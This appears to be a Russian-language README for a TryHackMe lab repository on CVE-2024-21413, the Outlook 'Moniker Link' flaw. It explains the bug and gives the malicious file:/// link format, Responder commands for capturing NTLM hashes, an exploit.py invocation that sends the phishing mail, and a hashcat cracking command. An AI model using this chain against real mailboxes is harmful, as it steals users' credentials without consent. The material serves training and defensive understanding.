
Пример исследования CVE-2024-21413. Используется как параметр в комнате TryHackMe Moniker Link (CVE-2024-21413). Внесены правки с помощью claude code в эксплойт.
⚠️ Правовое предупреждение: Этот репозиторий предназначен исключительно для образовательных целей и исследований в области безопасности. Все демонстрации проводились в контролируемых и изолированных средах. Использование этих методов против систем без явного разрешения незаконно и неэтично.
CVE-2024-21413 — это критическая уязвимость в Microsoft Outlook, позволяющая атакующему:
Название «Moniker Link» происходит от эксплуатации Monikers модели COM (Component Object Model) — механизма Windows для ссылки на объекты по строке — для обхода защитных механизмов Outlook против ссылок file://.
Обычно Outlook блокирует ссылки file://, указывающие на сетевые ресурсы, отображая предупреждение безопасности (Protected View). Ошибка заключается в том, как Outlook обрабатывает URL-адреса, содержащие символ ! — разделитель Moniker.
Вредоносная ссылка формата:
file:///\\IP_АТАКУЮЩЕГО\share\!что-то
Символ ! заставляет парсер Outlook интерпретировать URL как ссылку на COM Moniker, игнорируя обычные проверки безопасности. Результат:
Атакующий отправляет email → Жертва кликает по ссылке → Outlook обрабатывает URL с "!"
→ Обход Protected View → Автоматическое SMB-подключение → NTLM-хэш захвачен
Для безопасного воспроизведения этого исследования:
| Машина | Операционная система | Роль |
|---|---|---|
| Атакующий | Kali Linux | SMB-слушатель + Эксплойт |
| Цель | Windows 10/11 с уязвимым Outlook | Жертва |
Важно: Используйте изолированную сеть (NAT или Host-Only в VirtualBox/VMware). Никогда не запускайте в реальных сетях.
# Responder — SMB/HTTP-слушатель для захвата хэшей
sudo apt install responder
# Python 3 — для запуска эксплойта
python3 --version
# Проверка связности между машинами
ping <IP_ЦЕЛИ>
ip a | grep inet
# Запишите IP интерфейса, который связывается с целью (например, 192.168.56.10)
Responder создает поддельный SMB-сервер, захватывающий NTLM-хэши аутентификации.
sudo responder -I eth0 -v
# Замените eth0 на ваш сетевой интерфейс
Ожидаемый вывод:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ЦЕЛЬ\пользователь
[SMB] NTLMv2-SSP Hash : пользователь::DESKTOP-ЦЕЛЬ:...
python3 exploit.py \
--sender [email protected] \
--recipient [email protected] \
--server <IP_ПОЧТОВОГО_СЕРВЕРА> \
--attacker-ip 192.168.56.10
Когда жертва открывает письмо и кликает по ссылке, Responder автоматически захватывает NTLM-хэш. Этот хэш может быть:
hashcat -m 5600 hash.txt wordlist.txt
Смотрите файл exploit.py для полного и прокомментированного скрипта.
Смотрите файл diagrama-ataque.html для интерактивной визуализации полного потока атаки.
Смотрите файл MITIGACAO.md для полного руководства по смягчению и защите.
Смотрите файл CVE-BREAKDOWN.md для детального технического анализа уязвимости.
Исследование выполнено в рамках практического обучения атакующей безопасности через TryHackMe.
Этот проект следует принципам responsible disclosure и этичного хакинга. Весь представленный здесь контент направлен на обучение и улучшение уровня безопасности.
| Поле | Детали |
|---|
| CVE | CVE-2024-21413 |
| Раскрытие | 13 февраля 2024 (Patch Tuesday) |
| Оценка CVSS | 9.8 (Критический) |
| Продукт | Microsoft Outlook |
| Тип | Удаленное выполнение кода + Утечка учётных данных (NTLM Hash) |
| Вектор | Сеть / Электронная почта (без предварительной аутентификации) |
| Взаимодействие | Требуется взаимодействие пользователя (клик по ссылке) |
| Псевдоним | Moniker Link |